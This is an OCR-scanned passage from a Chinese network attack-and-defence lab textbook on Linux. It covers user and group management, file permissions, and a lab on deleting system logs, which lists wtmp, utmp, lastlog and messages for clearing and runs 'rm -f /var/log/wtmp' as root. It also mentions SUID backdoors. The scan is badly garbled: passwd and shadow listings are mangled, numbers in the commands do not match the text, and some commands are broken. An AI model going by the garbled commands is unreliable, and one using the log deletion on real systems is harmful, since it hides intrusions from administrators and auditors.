(5) 普通 用 户 的 UID 可 以 在 创建 时 由 管理 员 指 定 , 如 果 不 指定 ,用 户 的 UID 默认 从 
500 开始 顺序 编号 。 

Linux 系统 下 ,用 户 账 户 文件 有 以 下 两 个 。 

(1) /etc/passwd 文件 : 用 户 账 户 信 息 。 

(2) /etc/shadow 文件 : 用 户口 令 。 

Linux 系统 下 ,组 群 文件 有 以 下 3 个 。 

(1) /etc/group X fF: 组 群 账户 信息 。 

(2) /etc/gshadow 文件 : 组 群 口令 管理 员 等 管理 信息 。 

(3) /etc/login. defs X fF. 设置 用 户 账 户 限制 的 文件 ,该 文件 中 的 配置 对 root 用 户 
无 效 。 


3.2.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 谈 者 掌握 以 下 内 容 。 
(OD 用 户 和 组 群 的 配置 文件 。 

(2) Linux 下 用 户 的 创建 ,管理 和 维护 。 
(3) Linux 下 组 群 的 创建 ,管理 和 维护 。 
(4) 用 户 账户 管理 器 的 使 用 方法 。 
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2. 实验 条 件 


本 实验 中 所 使 用 的 Linux 操作 系统 为 Red Hat, 既 可 以 运行 在 物理 机 上 ,也 可 以 运行 在 
虚拟 环境 中 。 对 于 初学 者 来 说 ,建议 在 VMware 等 虚拟 机 环境 中 安装 Linux 操作 系统 , 进 
行 相关 的 实验 。 


3.2.3 实验 过 程 


步骤 1: 使 用 “cat/etc/passwd” 命 令 查 看 /etc/passwd 文件 ,如 图 3-6 所 示 。 


rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin 
ailnull1:x:47:47::7var^;spool^7mqueue :/sbin^nolog in 
smmsp:x:51:51::^7var^;spool^/mqueue :/sbin^nologin 
pcap:x:7?77:77::/var/arpwatch:/sbinznologin 
tp:x:38:38::7etc^ntp:^7sbin^nologin 

1bus:x:81:81:System message bus:/:/sbin^nologin 

1vahi:x:?78:78:fvahi daemon:7:/7sbin^znologin 
sshd:x:?4:74:Privilege-separated SSH:/uar^/empty^sshd:^7sbin^nologin 
rpcuser:x:29:29:RPC Service User:/var^/lib^nfs:^sbin^nologin 
fsnobody:x:65534:65534:6nonymous NFS User:/7/vuar/lib^nfs:^7sbin^nologin 
haldaemon:x:68:68:HAL daemon:^/:/sbin^nologin 
Auahi-autoipd:x:188:101:avahi-autoipd:/uar/lib^/auahi-autoipd :^sbin^nologin 
listcache:x:94:94:Distcache:7/:^7sbin^znologin 

Apache:x:48:48:fpache :/var/uuu:/sbin/nologin 
ebalizer:x:67:6?:Mebalizer:/var/wuuw/usage:^/sbin/nologin 
louecot:x:97:97:dovecot:^7usr^/libexec^douvecot :^sbin^znologin 
squid:x:23:23::7/var^spool^squid:^sbin^nologin 

ysq1:x:27:27:nMySQL Server:^7var/lib^mysq1:^/bin^bash 

amed :x:25:25:Mamed :/var/znamed :/sbin/znologin 
xfs:x:43:43:X Font Server:7etc^/X11/fs:/sbin^/nologin 
sabayon:x:86:86:Sabayon user:^7/home^7sabayon:^/sbin^znologin 
pegasus:x:66:65:tog-pegasus ÜpenPegasus WBEM CIM services:^7/var^/lib^zPegasus:^7sbin 
nologin 

est:x:588:588: :homevtes 目 :binzbash 

[root@cloudlab ~ 1# 


图 3-6 查看 /etc/passwd 文件 


需要 说 明 的 是 ,yetc/passwd 文件 每 行使 用 ”:? 分 隔 几 个 域 , 真 正 的 密码 保存 在 shadow 
文件 中 。 
步骤 2. 使 用 “cat/etc/shadow” 命 令 查 看 /etc/shadow 文件 ,如 图 3-7 所 示 。 


csa:**':15599:8:999993:7::: 
rpc:**:15599:8:99999:7::: 
ailnul11:?*?*:15599:8:99999:7::: 
smmsp : ?? : 15599 :8:99999:7::: 
pcap: tt :15599:8:99999:7::: 
tp:!!':15599:8:99999:7::: 
1bus:*':15599:8:99999:7:: 
10ahi:!!':15599:8:99999:7::: 
sshá:!!:15599:8:99999:7:: 
rpcuser:!!:15599:8:99999:7::: 
fsnobodyu:t*:15599:8:99999:7::: 
haldaemon:11:15599:8:99999:7?::: 
5vahi-autoipd:?f:15599:0:99999:7? : :: 
1istcache:f11:15599:8:99999:7?::: 
ache:11:15599:8:99999:?::: 
&balizer:!f:15599:8:99999: ?: 
1o0uecot:11:15599:8:99999:?: 
squid:1f:15599:8:99999:?::: 
usq1:11:15599:0:99999:?::: 
amed:*':15599:8:99999:?::: 
xfs:11:15599:8:99999:7::: 
sabayon:f*:15599:8:99999:7::: 


图 3-7 查看 /etc/shadow 文件 


94 网 络 攻 击 与 防御 实 训 


需要 说 明 的 是 ,所 有 用 户 对 passwd 文件 均 可 读 取 ,但 只 有 root H X} shadow 文件 可 
读 , 因 此 密码 存放 在 shadow 文件 中 更 安全 。 

步骤 3: 使 用 “cat/etc/group” 命 令 查 看 /etc/group 文件 。 用 户 的 组 账户 信息 放 在 
group 文件 中 ,任何 用 户 都 可 以 查看 且 用 “:” 将 几 个 域 分 开 , 如 图 3-8 所 示 。 


huvahi-autoipd:x:181: 
listcache:x:94: 


hpache:x:48: 
ebalizer:x:6?: 
louecot:x:97: 
squid:x:23: 
usq1:x:27: 
amed :x:25: 
[2:x:43: 
sabayon:x:BD6: 
screen:x:84: 
pegasus:x:65: 
est:x:588: 
rootBScloudlab ~] _ 


3-8 查看 /etc/group 文件 


步骤 4: 使 用 "cat/etc/gshadow?” 命 令 查看 /etc/gshadow 文件 。gshadow 文件 用 于 存放 
组 群 的 加 窗口 令 .组 管理 员 等 信息 ,只 有 root HF AiE., H“: ”分 割 成 4 个 域 , 如 图 3-9 所 示 。 


avahi-autoipd:x:: 
listcache:x:: 


3-9 查看 /etc/gshadow 文件 


步骤 5: 使 用 “useradd” 或 “adduser” 命 令 创建 新 用 户 ,其 命令 格式 为 、 


useradd [选项 ] < username > 


例如 ,创建 一 个 名 称 为 cloud HE ,如 图 3-10 所 示 。 
需要 说 明 的 是 ,如 果 系 统 中 创建 的 用 户 名 已 经 存在 ,将 出 现 如 图 3-11 所 示 的 提示 信息 。 
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[rootBcloudlab ~ J]# useradd cloud 
[root8cloudlab "18 — 


图 3-10 创建 新 用 户 


[root@cloudlab ~ ]# useradd cloud 
iseradd: user cloud exists 


[root@cloudlab  ]# . 


图 3-11 当 要 创建 的 用 户 在 系统 中 存在 时 出 现 的 提示 信息 


“useradd” 命 令 的 选项 含义 。 
v-c comment: 用 户 的 注释 性 信息 。 
v-d home dir: 指定 用 户 的 主 目 录 。 
v-e expire date; 禁用 账号 的 日 期 ,格式 为 : YYYY-MM-DD。 
v-f inactive days: 设置 账户 过 期 多 少 天 后 ,用 户 账户 被 禁用 。 
v-u UID: EHP H UID. 
v-g initial group: 用 户 所 属 主 组 群 的 组 和 群 名 称 或 GID, 
v-G group-list: 用 户 所 属 的 附属 组 和 群 列 表 。 
v-m: 如 果 用 户主 目录 不 存在 , 则 创建 它 。 
vM: 不 要 创建 用 户主 目录 。 
-n: 不 要 为 用 户 创建 用 户 私 人 组 群 。 
v-p: 加 密 的 口令 。 
r: 创建 UID 小 于 500 的 不 市 主 目录 的 系统 账号 。 
v-s: 指定 用 户 的 登录 Shell. A Jj / bin/ bash, 
步骤 6: 新建 用 户 userl UID 为 510 ,指定 其 所 属 的 私有 组 为 cloud Ccloud 组 的 标志 符 
为 1001) ,用户 的 主 目 录 为 /home/userl, 用 户 的 Shell Jj /bin/bash. H F By $E f$ X 123456. 
账户 永 不 过 期 ,如 图 3-12 所 示 。 


[root@cloudlab ~ ]# groupadd 1881 

[root@cloudlab ~ ]# useradd -u 518 -g 1881 -d home/userl1 -s /bin/bash -p 123456 
-f 1 userlil 

[rootBcloudlab “Ilt . 


图 3-12 新建 用 户 


步骤 7: 新 建 了 用 户 后 ,要 为 用 户 设 置 口令 ,未 设置 口令 的 用 户 不 能 登录 系统 ,使 用 
userl 来 登录 系统 (logout 注销 后 ,再 使 用 userl 用 户 登 录 ) ,如 图 3-13 所 示 。 


Red Hat Enterprise Linux Seruer release 5.4 (Tikanga) 
Kernel 2.6.18-164.e15 on an i686 


loudlab login: userí 


Login incorrect 


图 3-13 为 新 建 用 户 设 置 口令 
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步骤 8: 请 读者 重新 使 用 root 账户 登录 ,来 指定 和 修改 userl 用 户 账 户口 令 : passwd, 
如 图 3-14 所 示 。 


[root@cloudlab ~ J]# passwd userií 

hanging password for user userl. 

ew UNIX password: 
BAD PASSWORD: it is too simplistic^;sustematic 
Retupe neu UNIX password: 


passwd: all authentication tokens updated successfully. 
[root8cloudlab ^14 — 


3-14 ”指定 和 修改 useri 用 户 账户 口令 
需要 说 明 的 是 ,超级 用 户 root 可 以 为 上 月 己 和 其 他 用 户 设 置 口 令 ,而 普通 用 户 只 能 为 目 
己 设 置 口令 。 
步骤 9: 创建 组 群 命 令 “groupadd” 或 “addgroup”。 现 在 创建 一 个 组 群 testgroup, 如 
图 3-15 所 示 。 


[rootBcloudlab "18 groupadd testqroup 
[root8cloudlab ^14 — 


图 3-15 创建 组 群 


步骤 10: 使 用 “tail -1 /etc/group” 命 令 查 看 新 建 的 组 群 信息 ,如 图 3-16 所 示 。 


[rootBcloudlab © J# groupadd testgroup 
[root@cloudlab ~ ]# tail -1 /etc/group 


estqgroup:x:503: 
[root@cloudlab ~ ]# _ 


图 3-16 ”查看 新 建 的 组 群 信息 
步骤 11: 修改 组 群 .gid、 组 群 名 称 , 如 图 3-17 所 示 。 


[root@cloudlab “J]# groupmod -g 1883 testgroup 
[root@cloudlab "14 groupmod -n grouptest testgroup 
[root8cloudlab ~ ]# tail -1 /etc/group 


grouptest :x:1003: 
[rootecloudlab "TM. 


图 3-17 修改 组 群 .gid、 组 群 名 称 


3.2.4 任务 与 思考 


Linux 通过 基于 角色 的 身份 认证 方式 实现 对 不 同 用 户 (Cuser) 和 (group) 的 分 类 管理 ,来 
确保 多 用 户 、 多 任务 环境 下 操作 系统 的 安全 性 。 

请 读者 查阅 相关 的 文献 ,并 通过 上 机 操作 ,和 擎 握 Linux 系统 下 用 户 和 组 群 的 创建 与 管理 
Hn. 


3.3 Linux 文件 权限 管理 


3.3.1 预备 知识 : Linux 文件 权限 管理 的 特点 Im 
文件 是 操作 系统 用 来 存储 信息 的 基本 结构 ,是 一 组 信息 的 集合 , 它 通 过 文件 名 来 唯一 标 
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iM. Linux 中 的 文件 名 称 最 长 可 为 255 个 字符 ,这 些 字 符 可 用 A 一 2.0 一 9、.、、、- 等 符号 来 
表示 。 与 其 他 操作 系统 相 比 ,Linux 最 大 的 不 同 点 是 没有 “扩展 名 ”这 一 概念 ,也 就 是 说 文件 
的 名 称 和 该 文件 的 类 型 没有 直接 的 关系 。 例 如 ,smaple. txt 可 能 是 一 个 可 执行 文件 ,而 
sample. exe 也 可 能 是 文本 文件 ,甚至 可 以 不 使 用 扩展 名 。 

Linux 文件 名 的 男 一 个 特性 是 区 分 大 小 写 。 例 如 ,sample. txt, Sample. txt SAMPLE. 
txt 在 Linux 系统 中 分 别 代 表 不 同 的 文件 ,但 在 DOS 和 Windows 系统 下 却 是 指 同一 个 文 
件 。 在 Linux 系统 中 ,如 果 文 件 名 以 “. ”开始 ,表示 该 文件 为 隐藏 文件 ,需要 使 用 “1s -a” 命 令 
才能 显示 。 

1. 文件 权限 概述 

Linux 系统 中 的 每 一 个 文件 或 目录 都 包含 访问 权限 ,这 些 访问 权限 决定 了 谁 能 访问 和 
如 何 访问 这 些 文件 和 目录 。 通 过 设置 ,可 以 从 以 下 3 种 访问 方式 限制 访问 权限 。 

d) 只 允许 用 户 目 己 访问 。 

(2) 允许 一 个 预先 指定 的 用 户 组 中 的 用 户 访 问 。 

(3) 允许 系统 中 的 任何 用 户 访 问 。 

用 户 能 够 控制 一 个 给 定 的 文件 或 目录 的 访问 程度 。 一 个 文件 或 目录 可 能 有 读 、 写 及 执 
行 权限 。 当 创建 一 个 文件 时 ,系统 会 日 动 地 赋予 文件 所 有 者 读 和 写 的 权限 ,这 样 可 以 允许 所 
有 者 能 够 显示 文件 内 容 和 修改 文件 。 文 件 所 有 者 可 以 将 这 些 权 限 改 变 为 任何 他 想 指 定 的 权 
限 。 一 个 文件 也 许 只 有 读 权 限 ,禁止 任何 修改 ; 也 可 能 只 有 执行 权限 ,允许 像 一 个 程序 一 样 
来 执行 。 

如 图 3-18 所 示 ,每 一 行 的 第 一 个 字符 一 般 用 来 区 分 文件 的 类 型 ,一 般 取 值 为 d、-、1、b、 
c\sS\D。 具 体 含义 如 下 。 

d: 表示 一 个 目录 ,在 ext 文件 系统 中 目录 也 是 一 种 特殊 的 文件 。 

-: 表示 该 文件 是 一 个 普通 的 文件 。 

1: 表示 该 文件 是 一 个 符号 链接 文件 ,实际 上 它 指 问 男 一 个 文件 。 

b.c: 分 别 表示 该 文件 为 区 块 设备 或 其 他 的 外 围 设备 ,是 特殊 类 型 的 文件 。 

s.p: 这 些 文件 关系 到 系统 的 数据 结构 和 管 这 ,通常 很 少见 到 。 


rootecloudlabvm:/var& ls -1 
total 44 
drwxr-xr-x 2 root root 4096 May 7 10:55 backups 
drwxr-xr-x 6 root root 4096 Jun 16 20:40 cache 
druxr-*xr-x 19 root root 4096 Jun 16 20:56 lib 
druxrusr-x 2 root staff 4096 May 7 10:55 
druxruyxrut 2 root root 34096 Jul 7 06:23 
> 了 root root 34096 Jul 7 06:23 

2 root mail 4096 Jun 16 20:33 

2 root root 34096 Jun 16 20:39 

5 root root 4096 Jul 7 06:23 

4 root root 4096 Jun 16 20:5€ 

e root root 4096 Jun 16 20:59 


rootéCloudlabuvm:/var& .. 


图 3-18 ”显示 文件 的 类 型 


2. 文件 权限 的 组 成 

在 图 3-18 的 显示 结果 中 ,每 一 行 的 第 2 一 10 个 字符 表示 文件 的 访问 权限 。 这 9 个 字符 
每 3 个 为 一 组 ,左边 3 个 字符 表示 所 有 者 权限 ,中间 3 个 字符 表示 与 所 有 者 同一 组 用 户 的 权 
限 ,右边 3 个 字符 是 其 他 用 户 的 权限 。 代 表 的 意义 如 下 。 
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(OD 字符 2、3、4 表示 该 文件 所 有 者 的 权限 ,也 简称 为 uCUser) 的 权限 。 

(2) 字符 5、6、7 表示 该 文件 所 有 者 所 属 组 群 中 组 成 员 的 权限 。 例 如 ,此 文件 拥有 者 属 
? ud user" 2H fif . 该 组 群 中 有 6 个 成 员 ， 表示 这 6 个 成 员 都 有 此 处 指定 的 权限 ， 简称 为 
gCGroup) 的 权限 。 

(3) 字符 8、9、10 表示 该 文件 所 有 者 所 属 组 群 以 外 的 权限 ,简称 为 oCOther) 的 权限 。 

9 个 字符 根据 权限 种 类 的 不 同 ,也 分 为 以 下 几 种 类 型 。 

r(Read, 读 取 ): 对 文件 而 言 ,具有 读 取 文件 内 容 的 权限 ; 对 目录 来 说 ,具有 浏览 目录 的 
权限 。 

wCWrite, 5A): 对 文件 而 言 ,具有 新 增 \ 修 改 文件 内 容 的 权限 ; 对 目录 来 说 ,具有 删 
除 .移动 目录 内 文件 的 权限 。 

x(Execute ,执行 ): 对 文件 而 言 ,具有 执行 文件 的 权限 ; 对 目录 来 说 ,该 用 户 具 有 进入 目 
录 的 权限 。 


-: 表示 不 具有 该 项 权限 。 

每 个 用 户 都 拥有 自己 的 主 目录 ,通常 在 /home 目录 下 ,这 些 主 目录 的 默认 权限 为 
rwx- 一 一 -; 执行 “mkdir” 命 令 所 创建 的 目录 ,其 默认 权限 为 rwxr-xr-x。 用 户 可 以 根据 需要 修 
改 目 录 的 权限 。 


默认 的 权限 可 用 “umask” 命 令 修 改 。 例 如 ,执行 “umask 777” 命 令 , 便 可 以 屏蔽 所 有 的 
权限 ,之 后 建立 的 文件 或 目录 ,其 权限 都 变 成 000。 

3. 文件 与 目录 设置 的 特殊 权限 

由 于 特殊 权限 会 拥有 一 些 “ 特 权 ”, 因 而 用 户 如 果 无 特殊 需求 ,不 应 该 启用 这 些 权 限 , 避 
免 安 全 方面 出 现 严 重 漏洞 ,造成 攻击 者 入 侵 , 甚 至 破坏 系统 。 

(D s 或 SCSUID,Set UID): 当 可 执行 的 文件 拥有 了 这 个 权限 后 便 能 得 到 特权 ,使 任意 
访问 该 文件 的 所 有 者 都 能 够 使 用 全 部 系统 资源 。 请 注意 具备 SUID 权限 的 文件 ,攻击 者 经 
常 利用 这 种 权限 ,以 SUID 配 上 root 账号 拥有 者 ,在 系统 中 开启 后 门 ,供需 要 时 进出 使 用 。 

(2) s 或 SCSGID、Set GID): 设置 在 文件 上 面 ,其 效果 与 SUID 相同 ,只 不 过 将 文件 所 
有 者 换 成 用 户 组 ,该 文件 可 以 任意 访问 整个 用 户 组 所 能 使 用 的 系统 资源 。 

(3) t zX T(Sticky) : /tmp 和 /var/tmp 目录 供 所 有 用 户 暂 时 访问 文件 , 即 每 位 用 户 都 拥 
有 完整 的 权限 进入 该 目录 ,去 浏览 .删除 和 移动 文件 。 在 文件 建立 时 系统 会 自动 设置 权限 ， 
如 果 这 些 默 认 权 限 无 法 满足 需要 ,此 时 可 以 使 用 “shmod” 命 令 来 修改 权限 。 

通常 在 权限 修改 时 可 以 用 两 种 方式 来 表示 权限 类 型 . 数字 表示 法 和 文字 表示 法 。 

“chmod” 命 令 的 格式 为 : 


chmo [选项 ] 文 件 


数字 表示 法 是 指 将 读 取 (r) 、 写 入 (w) 和 执行 (x) 分 别 以 4、2、1 来 表示 ,没有 授权 的 部 分 
就 表示 为 0, 然 后 再 把 所 授予 的 权限 相 加 而 成 。 


3.3.2 实验 目的 和 条 件 


1. 实验 目的 
通过 本 实验 ,使 读者 掌握 以 下 内 容 。 


$ 3x Linux 操作 系统 攻防 实 训 99 


(1) 使 用 “chmod” 命 令 按 照 要 求 更 改 用 户 对 于 特定 文件 的 权限 。 

(2) 使 用 “unmask” 命 令 更 改 默 认 权 限 。 

(3) 使 用 “chown” 命 令 更 改 文件 的 所 属 用 户 和 组 。 

2. 实验 条 件 
虚拟 环境 中 。 对 于 初学 者 来 说 ,建议 本 实验 在 运行 在 虚拟 机 环境 中 的 Red Hat 系统 上 
进行 。 


3.3.3 实验 过 程 


步骤 1i 在 test 的 家 (home) 目 录 中 建立 一 个 user 子 日 录 , 如 图 3-19 所 示 。 


[root@cloudlab "18 cd home/test/ 


[root@cloudlab test ]# mkdir user 
[root@cloudlab test]# — 


3-19 Æ test 的 home 目录 中 建立 一 个 user 于 目录 
步骤 2: 在 user 目录 下 建立 一 个 file 文件 ,如 图 3-20 所 示 。 


[root@cloudlab testit cd user 
[rootBcloudlab userlt touch file 
[root@cloudlab user]# — 


A 3-20 在 user 目录 建立 一 个 file 文件 


步骤 3: 查看 file 文件 的 所 有 属性 ,命令 为 “ls -1”, 如 图 3-21 所 示 。 


| 

otal 4 

-rw-r--r-- 1 root root 8 Jan 7 87:12 file 
[root@cloudlab userlH _ 


图 3-21 查看 file 文件 的 所 有 属性 


步骤 4: 对 文件 file 设置 权限 ,使 其 他 用 户 可 以 对 此 文件 进行 写 操作 ,并 查看 设置 结果 ， 
命令 为 “chmod o+w file”, 如 图 3-22 所 示 。 


[root cloudlab userl# ls -1 

otal 4 

-rw-r--r-- 1 root root 8 Jan 7 87:12 file 
[rootBcloudlab userl# chmod o+w file 
[root8cloudlab user]t ls -1 


otal 4 
-rw-r--rw- 1 root root 8 Jan 7 87:12 file 
[rootBcloudlab user]J# _ 


图 3-22 ”对 文件 file 设置 权限 
步骤 5: 取消 同 组 用 户 对 file 文件 的 读 取 权限 ,并 查看 设置 结果 ,命令 为 “chmod gr 
file”, 如 图 3-23 所 示 。 
步骤 6: 用 数字 形式 为 文件 fle 设置 权限 ,所 有 者 可 读 、 可 写 、 可 执行 ; 其 他 用 户 和 所 属 
组 用 户 只 有 读 和 执行 的 权限 。 设 置 完成 后 查看 设置 结果 ,命令 为 “chmod 755 file”, 如 图 3-24 
所 示 。 
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[rooticloudlab userltt chmod g-r file 
[rootBcloudlab user]# ls -1 
otal 4 


-rw----rw- 1 root root B Jan 7 87:12 file 
[root8cloudlab user]J# — 


图 3-23 取消 同 组 用 户 对 file 文件 的 读 取 权限 


[root@cloudlab user]J]# chmod 755 file 
[root@cloudlab user]l]t ls -1 

otal 4 

-ruxr-xr-x 1 root root B Jan 7 07:12 file 
[root8cloudlab user]ü — 


图 3-24 用 数字 形式 为 文件 file 设置 权限 ,所 有 者 可 读 、 可 写 、 可 执行 


步骤 7: 用 数字 形式 更 改 文件 file 的 权限 ,使 有 所 有 者 只 能 读 取 此 文件 ,其 他 任何 用 户 痢 
没有 权限 。 查 看 设置 结果 ,具体 命令 为 “chmod 400 file”, 如 图 3-25 所 示 。 


[rootg@cloudlab userlł chmod 488 file 
[rootBcloudlab user]H ls -1 


1 root root 8 Jan 7 87:12 file 
[roaot8cloudlab userltüt — 


图 3-25 用 数字 形式 更 改 文件 file 的 权限 ,使 所 有 者 只 能 读 取 此 文件 


步骤 S. 改变 文件 的 所 有 者 ,查看 目录 test 及 其 中 文件 的 所 属 用 户 和 组 。 修 改 file 文件 
的 所 有 者 为 test, 命 令 为 “chown test. test file”, 如 图 3-26 所 示 。 


[root@cloudlab userJ# chown test.test file 
[root@cloudlab user]# ls -1 


1 test test B Jan 7 8?:12 file 
[rootGc loud lab userlt — 


3-26 ”改变 文件 的 所 有 者 


3.3.4 任务 与 思考 


在 Linux 中 ,不 仅仅 是 普通 的 文件 ,包括 目录 .字符 设备 、 块 设备 、 套 接 字 等 在 内 的 所 有 
类 型 都 以 文件 形式 被 对 待 , 即 “ 一 切 丝 是 文件 ”。Linux 中 对 所 有 文件 与 设备 资源 的 访问 控 
都 通过 VFS(Virtual File System ,虚拟 文件 系统 ) 来 实现 ,所 以 在 Linux 的 虚拟 文件 系统 

全 模型 中 ,可 通过 设置 文件 的 相关 属性 来 实现 系统 的 授权 和 访问 控制 。 

请 读者 查阅 相关 文献 ,结合 Linux 的 VFS 特点 ,对 Linux 的 文件 系统 进行 系统 的 学 习 ， 
并 通过 具体 的 实验 操作 等 握 其 管理 方法 。 


3.4 Linux 系统 日 志 的 清除 


3.4.1 预备 知识 : Linux 系统 日 志 的 特点 


日 记 (log) 是 指 系统 所 指定 对 象 的 某 些 操作 和 操作 结果 按时 间 先 后 顺序 组 合 后 形成 的 
集合 。 每 个 日 志文 件 由 日 志 记 录 组 成 ,每 条 日 志 记 录 描 述 了 一 次 单独 的 系统 事件 。 通 常情 
况 下 ,系统 日 志 是 用 户 可 以 二 接 阅 读 的 文本 文件 ,其 中 包含 了 一 个 时 间 惟 和 一 个 信息 或 子 系 
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统 所 特有 的 其 他 信息 。 日 志文 件 为 服务 器 .工作 站 、 防 火 墙 和 应 用 软件 等 信息 资源 相关 活动 
记录 必要 的 `\ 有 价值 的 信息 ,这 对 系统 监控 查询 和 安全 审计 是 十 分 重要 的 。 

从 攻击 者 的 角度 来 看 ,日志 文件 中 记录 的 事件 信息 对 攻击 者 掌握 系统 的 运行 内 容 和 运 
行 状况 是 很 有 帮助 的 ; 而 从 防范 的 角度 来 看 ,日 志 中 可 以 记录 几乎 所 有 的 攻击 行为 ,这 些 事 
件 信 息 对 于 确定 攻击 源 及 攻击 意图 ,进而 确定 相应 的 防范 方法 都 是 很 有 价值 的 。 

1. Linux 系统 中 的 主要 日 志 

在 Linux 系统 中 ,有 以 下 3 个 主要 的 日 志 子 系统 。 

CO 系统 接 入 日 志 。 多 个 程序 会 记录 该 日 志 , 分 别 记 录 到 /var/log/wtmp 和 /var/log/ 
utmp 中 ,telnet 和 ssh 等 程序 都 会 更 新 wtmp 与 utmp 文件 ,系统 管理 员 可 以 根据 该 日 志 跟 
中 到 谁 在 什么 时 间 登 录 过 系统 。 

(2) 进程 统计 日 志 。 进 程 统计 日 志 由 Linux 内 核 记 录 , 当 一 个 进程 终止 时 ,进程 终止 文 
件 (pacct 或 acct) 中 会 对 这 一 事件 进行 记录 。 进 程 统计 日 志 可 以 供 系 统管 理 员 分 析 系 统 使 
用 者 对 系统 进行 的 配置 ,以 及 对 文件 进行 的 操作 。 

(3) 错误 日 志 。Syslog 日 志 系 统 已 经 被 许多 设备 兼容 ,Linux 的 Syslog 可 以 记录 系统 
事件 ,主要 由 syslogd 程序 执行 ,Linux 系统 下 各 种 进程 ,用户 程序 和 内 核 都 可 以 通过 Syslog 
文件 记录 重要 信息 ,错误 日 志 记 录 在 /var/log/messages 中 。 

2. Linux 系统 日 志 的 工作 特点 

在 Linux 系统 中 ,有 关 当 前 登录 用 户 的 信息 记录 在 文件 utmp 中 ; 登录 进入 和 退出 等 信 
息 记录 在 文件 wtmp 中 ; 最 后 一 次 登录 文件 可 以 用 “lastlog” 命 令 查 看 ; 数据 交换 、 关 机 和 重 
局 也 记录 在 wtmp 文件 中 。 所 有 的 记录 都 包含 时 间 戳 ,这 些 文件 (lastlog 通常 不 大 ) 在 具有 
大 量 用 户 的 系统 中 增长 十 分 迅速 。 例 如 ,wtmp 文件 可 以 无 限 增长 ,除非 定期 截取 ,因此 许 
多 系统 以 一 天 或 一 周 为 单位 把 wtmp 配置 成 循环 使 用 。 它 通常 由 cron 运行 的 脚本 来 修改 ， 

日 这 些 脚 本 重新 命名 并 循环 使 用 wtmp 文件 。 通 常 ,wtmp 在 第 一 天 结束 后 命名 为 wtmp. 1; 
第 二 天 结束 后 wtmp. 1 变 为 wtmp. 2; 如 此 循环 ,直到 变 为 wtmp. 7. 


3.4.2 实验 目的 和 条 件 


1. 实验 目的 

通过 本 实验 ,使 谈 者 主要 擎 握 以 下 内 容 。 
(1) Linux 日 志 的 作用 。 

(2) Linux 日 志 的 存放 位 置 及 工作 特点 。 
(3) Linux 日 志 的 删除 方法 。 


2. 实验 条 件 

本 实验 中 所 使 用 的 Linux 操作 系统 为 Red Hat, 既 可 以 运行 在 物理 机 上 ,也 可 以 运行 在 
虚拟 环境 中 。 
3.4.3 实验 过 程 


1. 查看 Linux 系统 日 志 


主要 操作 步骤 如 下 。 
步骤 1: 以 root 身份 登录 系统 后 ,执行 “cat/yvar/log/messages” 等 命令 查看 以 下 各 个 日 
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志 内 容 , 如 图 3-27 所 示 。 其 中 ,/var/log/messages 是 核心 系统 日 志文 件 , 它 包含 了 系统 局 
动 时 的 引导 消息 ,以 及 系统 运行 时 的 其 他 状态 消息 。1/O 错误 、 网 络 错误 和 其 他 系统 错误 都 
会 记录 到 这 个 文件 中 ,而 其 他 信息 ,如 某 个 用 户 的 身份 切换 为 root, 也 在 这 里 列 出 。 如 果 服 
务 正在 运行 (例如 运行 中 的 DHCP Hl 4$ 380 ,也 可 以 在 messages 文件 中 观察 到 它 的 活动 。 
3i 4$ . / var/log/messages 是 系统 管理 员 在 进行 故障 诊断 时 首先 要 查看 的 文件 。 

此 外 ,还 包括 以 下 日 志 。 

/var/log/secure: 与 安全 相关 的 日 志 信 息 。 
/var/log/maillog: 与 邮件 相关 的 日 志 信 息 

/var/log/cron; 与 定时 任务 相关 的 日 志 信 息 。 

/ var/log/spooler: 与 新 设备 相关 的 - is [ri 

/ var/log/boot. log: 守护 进程 局 动 和 停止 相关 的 日 志 消 息 。 


root&isch:/usr/local/virmachine 


File Edit View Search Terminal Help 


图 3-27 查看 各 类 日 志 内 容 


步骤 2: 以 root 号 份 登录 后 ,执行 “who/var/1log/wtmp” 或 “last” 命 令 , 查 看 wtmp 文件 
的 内 容 , 如 图 3-28 所 示 。 该 日 志文 件 永久 记录 每 个 用 户 登 录 ,注销 及 系统 的 启动 .停机 的 事 
件 。 因 此 随 者 系统 正常 运行 时 间 的 增加 ,该 文件 也 会 越 来 越 大 ,其 增加 的 速度 取决 于 系统 用 
户 登 录 的 次 数 。 该 日 志文 件 可 以 用 来 查看 用 户 的 登录 记录 ,通过 “last” 命 令 可 以 访问 这 个 
文件 获得 这 些 信 息 , 既 可 以 反 序 从 后 向 前 显示 用 户 的 登录 记录 ,也 能 根据 用 户 、 终 端 tty 或 
时 间 显 示 相 应 的 记录 。 

命令 “last”" 有 以 下 两 个 可 选 参 数 。 

last-u 用 户 名 : 显示 用 户 上 次 登录 的 情况 。 

last-t 天 数 : 显示 指定 天 数 之 前 的 用 户 登 录 情 况 。 


rootiisch:;/usr/tocal/virmac 


hie Edit View Search Termina! Help 


3-28 查询 wtmp 文件 的 内 容 
步骤 3: 使 用 “history” 命 令 ,查看 最 近 所 执行 过 的 命令 ,如 图 3-29 所 示 。 


File Edit View Search Terminal Help 


图 3-29 ”查看 最 近 所 执行 过 的 命令 
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2. 手动 删除 Linux 日 志 

常用 的 日 志文 件 如 下 。 

access-log: 记录 http/web 的 传输 。 

acct/pacct; 记录 用 户 命令 。 

aculog: 记录 Modem 的 活动 。 

btmp: 记录 失败 的 记录 。 

lastlog: 记录 最 近 几 次 成 功 登 录 的 事件 和 最 后 一 次 不 成 功 的 登录 。 

messages: 从 syslog 中 记录 信息 (有 的 链接 到 syslog XH). 

syslog: 从 syslog 中 记录 信息 (通常 链接 到 messages 文件 ) 。 

utmp: 记录 当前 登录 的 每 个 用 户 。 

wtmp: 一 个 用 户 每 次 登录 进入 和 退出 时 间 的 永久 记录 。 

xferlog: 记录 FTP 会 话 。 

- 般 情 况 下 ,需要 清除 的 日 志 主 要 有 lastlog、utmp(utmpx)、wtmp(wtmpx) , messages, 

syslog 等 。 

步骤 1. 输入 “1s/var/log” 命 令 ,查看 /var/log 目录 下 的 日 志文 件 , 如 图 3-30 所 示 。 


rootgisch:/usr/local/virmachine 


gdm 
httpd 


spice-vdagentd 


libvirt 


ntpstats 


ppp 
prelink 
rhsm 

LT. 


3-30 查看 log 文件 夹 下 的 日 志文 件 


步骤 2. 使 用 root 身份 登录 系统 ,执行 “rm -f /var/log/wtmp” 命 令 , 如 图 3-31 所 示 ,再 
用 ”1s /var/log” 命 令 查看 /var/log 目录 下 的 日 志文 件 , 发 现 wtmp 被 删除 ,如 图 3-32 所 示 。 


rootgisch:usr/ocal/vir 


